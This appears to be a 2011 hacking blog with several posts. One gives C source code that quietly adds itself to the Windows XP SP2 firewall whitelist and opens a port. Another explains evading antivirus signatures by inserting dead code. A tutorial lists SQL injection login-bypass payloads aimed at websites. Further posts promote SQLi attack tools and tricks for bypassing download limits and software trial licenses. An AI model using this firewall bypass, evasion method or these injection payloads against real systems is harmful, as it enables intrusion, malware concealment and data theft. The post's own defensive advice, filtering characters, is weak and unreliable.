Tuesday 7 June 2011

How to Bypass Windows XP Firewall

How to Bypass Windows XP Firewall using C program.
Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.



Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List


Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-


#include <*stdio.h*>
#include <*windows.h*>

#include <*ezsocket.h*>

#include <*conio.h*>

#include "Shlwapi.h"

int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;

struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

How does Antivirus software works or detects virus

Hello friends, today i will explain you all how an anti-virus software works and detects virus. Most of you already know that what is anti-virus, but have you ever tried to understand how it works and why it requires updates regularly? How anti-virus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of anti-virus involves two basic technologies namely:
1. Dictionary based continuous and fragmented string search
2. Suspicious activity detection (process manipulation)

antivirus working, how antivirus detects virus
How does anti-virus software works

So friends, lets start learning how an anti-virus works and detects virus and then eliminates and heals them.

Dictionary based continuous and fragmented string Search:

As the technique's name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, anti-virus software searches a string by comparing the file with strings existing in virus definition's or database.
 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behavior of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
where 012345 is the string that virus has attached to the file after infection.
Now what does anti-virus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.
Note: This all processing is done on binary format of codes and sometimes executable. 
Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:
0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the anti-virus database so it is not detected by anti-virus.
How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character 'a' is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.
Note: But suspicious activity technique might detect this way as functionality of virus string is same.

That's the main reason why anti-virus needs updates regularly. Anti-virus companies daily adds new detected strings to their database so that the user can remain secure.

We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:
1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.
2. Most tools available are already infected with key-loggers and spy Trojans that inspect your system and send personal credentials to hackers who has created them.

Suspicious activity detection:


The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that anti-virus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then anti-virus identifies that file as virus and terminate that program and process related to it. That's the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity. 
The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your anti-virus suggests.
Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with Trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains back-doors that make your system open for attack similar to the way you have left your house main gate open for thieves in night....:P but its truth... 

So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted free wares as alternatives for paid tools rather than using their cracked versions...

Wednesday 1 June 2011

Browse anonymously using Torpark Browser – For downloading multiple files Rapidshare Hackin

I have posted about Skipping or Bypassing Rapidshare or Megaupload, hotfile waiting time.

In this post I have a new Rapidshare hacking tip for you. Well, you might be aware of Browsers like Firefox, or Internet Explorer. I would like to introduce you to a browser known as Torpark Browser, which works as a anonymous web browser. It is like a proxy browser where you can change your permanent IP Address  to dynamic IP Address. So, when ever you run this browser you get a new IP address.  Now download mutliple files at the same time. Yes you read it right, you can download multiple rapidshare files or megaupload, hotfile files at the same time. You can even skip or bypass the time limit on downloading files. The most amazing thing is IDM works with this browser.
Note: You need to close the browser window after each download coz it will reset the ip address.
download
Description of Torpark Browser:
Torpark Browser for surfing anonymously
As a way of avoiding spyware and pop-ups, Torpark successfully allows you to surf the Web anonymously, although the publisher warns of possible connection slowdowns.
The self-extracting file installs quickly, and you can run it from your hard drive, or as the publisher suggests, from a jump drive. Torpark adds to your browser’s toolbar a few unobtrusive buttons, which allow you to activate/deactivate the tool and configure its privacy settings according to your specifications. The tool effectively restricts pop-ups; blocks surreptitious installations of adware, spyware, and cookies; and hides any traces of your surfing. You can check the Torpark Tools menu while visiting a site and build a list of blocked items for the current page; from the same list box, you may add to a white list any or all of the displayed items.
The publisher cautions that using Torpark may slow your Internet connection speed, particularly if you’re using a dial-up, but we noticed no slowdown during our tests. Torpark is free, easy to use, and suitable for all users interested in protecting their privacy while visiting Web sites.

Saturday 28 May 2011

Top 5 Hack Tools for Hackers to Investigate Computer System

 Hello Friends, today i will share with you top 5 hack tools for hackers to Investigate or Forensic their computer system or PC. Have you ever felt that your system is compromised or shared ? Do you think your system has unusual softwares or packages installed on it that sends your confidential or secret personal data to other Hackers? Always fears to test any hack tool that it contains viruses or malware or not? Wanna investigate your network that which application is sending which data to whom or where?
If any of the question fits you then this post is for you. But if i speak by heart these tools are must for every normal users and hackers too to investigate their systems from boot to close. Today i am making you a real ethical hacker as today i will teach you how to investigate your system. And how to get rid of noobish antiviruses that do simply nothing on your PC just consumes resources of your system.


List of top 5 hack tools for hackers to Inverstigate or Forensic Computer system or PC:
1. Live View
2. Start up List
3. Open Files View
4. Wireshark
5. Helix 3


Working of above tools stepwise:
1. Live View
Live View is an open source utility that creates a virtual machine of the existing system. Live View creates a virtual disk out of the system that allows you to then safely investigate a copy of the system without interfering with anything installed. So you can easily investigate your system virtually without affecting the original system.
Now restart you PC for further investigations and tools to use.
You can download Live View for free here (Click here to download).


2. Start up List
Now you have a virtual copy of your system and now why you are waiting let's start investigating PC. So download the Start Up List (click here to download startup list).This is a great way to start the investigation of a system and determine what things might have potentially been put on the system to restart each time the system does. It will provide you the list of all programs that system use during the boot time. Great way to find the key-loggers and other remote monitoring tools as they are always added to start up.
Now why i am saying this tool as you can directly do it using MSCONFIG command. Answer is as simple as question, msconfig only displays the list of programs that are attached to start up using registry keys. Normally what happens the viruses attach themself to some of the existing windows service so it will become difficult to identify its instances. Start up list displays all the back ground programs too.


3. Open Files View
The next step in investigating your computer is to find or determine which other files, other than usual are open. In Linux we can directly do this using the ISOF command in the terminal but there is no similar command in windows. Ahhah now what will you do to investigate this.. Don't worry OpenFilesView is there(click here to download openfileview). Openfilesview is a Windows executable that lists all the files and processes that are active currently – both local and network based – on the system. So you can easily identify which unusual file is opened or which unusual process is running. Now how it helps, all key-loggers or remote administration tools always maintains a temporary file on which they write their logs or other details. Now nothing is hidden from you. You can see each and everything and find out easily that which noob virus or keylogger is running on your system.


4. Wireshark
Mine favorite tool out of 5 tools. Now you have researched your system using above there tools, it time to investigate your network traffic. Several times it happens, when you install some software you doubt that it is sending your personal data or information to someone else. Wireshark is a tool that monitors your network packets and analyze them where its sending data. Now how its helpful for you, Most Trojans and key-loggers sends logs using network and upload them to FTP or send them to some email address. Using wireshark you can monitor what they are sending and even the username and password of FTP and email accounts on which it is sending. This is the most promising factor that makes to love wireshark more. So why waiting download the wireshark for free: (Click here to download Wireshark).


5. Helix 3
Now you all will be thinks we have done everything, investigating is done.but i am Destructive Mind. So few more things are striking my mind. What more i can investigate in the PC. Any guesses...
Damn.. i forgot i was teaching you..
Now how will you determine what the noob viruses has changed in your system, which files they have edited or attached their signatures to which of the programs and most important what they have edited or added. This you can do with the help of Helix 3. Helix 3, a newly updated version of the live Linux forensics tool, can be used to examine the disk safely to see what has been finally changed. So guys now how classy you think you have become. But sorry to inform you that its the first part of hacker's life and i guarantee 99.99% guys doesn't know these tools. Ahhh... If they know about these tools then they surely doesn't know how to use them and more important if they know that also they probably never used them as they are LAZY enough and leave everything on noob antiviruses.
(Click here to download helix3)  Its a 30 day trial version guys, as licensed version is for one system only. But i can tell you some awesome tricks to use it as much as you want. For downloading evaluation version again and again just register with new email ID and remove the previous version using WinXP manager which removes registry keys also.


One more suggestion about these noob antiviruses, they detect only those viruses and Trojans that are in their database, if a new virus has come then you have to wait till next database upgrade for getting it detected.

SQL injection Hack tool for hacking websites and database

Safe3SI is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


how to hack websites using SQL injection, SQL Hack tool


Features

  • Full support for http, https website.
  • Full support for Basic, Digest, NTLM http authentications.
  • Full support for GET, Post, Cookie sql injection.
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
  • Powerful AI engine to automatic recognize injection type, database type, sql injection best way.
  • Support to enumerate databases, tables, columns and data.
  • Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
  • Support to ip domain query,web path guess,md5 crack etc.
  • Support for sql injection scan.

Download

SQL Injection tutorial to Hack websites | Hacking websites

we have already discussed about SQL Injections method of hacking websites . Some of my website users reported that those articles are little bit difficult to understand for new users who wish to learn hacking. For the sake of new users who wish to learn website hacking and SQL injection, i am writing this article  at such a basic level that the user who didn't even have any prior knowledge of SQL can start SQL Injecting websites. This article is also beneficial for hackers too as it will refresh their concepts that what really we have to do and look into website URL if we want to hack website or its database using SQL injection. So Guys read on very basic SQL injection tutorial...
hacking websites, sql injection attack
SQL injection tutorial to hack websites | Hacking website databse


What is SQL Injection?
Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have entered something say Adnan and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.

Requirements for SQL Injection:
1. You need a web browser to open URL and viewing source codes.
2. Need a good editor like Notepad ++ to view the source codes in colored format so that you can easily distinguish between the things.
3. And very basic knowledge of some SQL queries like SELECT, INSERT, UPDATE, DELETE etc..

What you should look into website to detect is it vulnerable to SQL injection attack or not?
First of all you can hack those websites using SQL injection hacks that allows some input fields from which can provide input to website like log in page, search page, feedback page etc. Nowadays, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

 < F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>
Everything between the < f o r m >  and < / f o r m > parameters (remove spaces in words) contains the crucial information and can help us to determine things in more detailed way.


There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:
http://example.com/login.asp?id=10

Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:
http://example.com/login.asp?id=hi' or 1=1--

 You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:

< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t  type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

 
 If your luck is favoring you, you will get the login into the website without any username or password.


But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports
In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.
SELECT * FROM TABLE-NAME WHERE category='sports'
Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or 1=1--'
 
The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a
 
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

How to protect you own websites from SQL injection?
 
Filter out character like   '    "    -    /    \    ;    NULL, etc. in all strings from:
*
Input from users
*
Parameters from URL
*
Values from cookie
That's all for today, 
I hope it really helped you to clear your basics about website hacking or website database hacking using SQL injection.
If you have any queries ask me in form of comments...
Regards
sarvesh

How To Hack Websites With Hexjector v1.0.7.3 Special Edition

Hexjector is an Opensource,Multi-Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties

Features:

1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Detect WAF on the site.
4.Scan For Admin Page
5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection

Download:Sql Injection Tool Hexjector

...............:"{)(*&^%$#@!###.................................................................................................